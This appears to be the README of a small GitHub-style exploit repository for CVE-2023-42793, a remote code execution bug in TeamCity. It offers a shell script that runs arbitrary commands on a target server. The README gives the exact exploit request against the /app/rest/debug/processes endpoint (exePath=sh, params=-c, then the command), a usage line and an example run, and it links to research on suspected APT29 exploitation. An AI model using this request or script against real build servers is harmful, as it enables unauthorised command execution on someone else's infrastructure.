teamcity-exploit-cve-2023-42793# TeamCity Exploit Cve 2023 42793
A quick script to exploit the cve-2023-42793 bug. Some additional reading on the exploit can be found here:
https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793
https://www.cnblogs.com/LittleHann/p/17843271.html
This script adds in the ability to use "params" freely to execute commands after triggering the RCE bug:
`RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"`
## To run the script:
`Usage: <base_url> <port> <command>`
## Example:
`./TeamCity.sh blah.com 8111 "ls -lah"`
The original script is here, full credit needs to go to them: https://github.com/Zenmovie/CVE-2023-42793
[4.0K] /data/pocs/e447b3c259383fc3e406ae8e3c4149e24cd2e0bf
├── [ 742] README.md
└── [1.3K] TeamCity.sh
0 directories, 2 files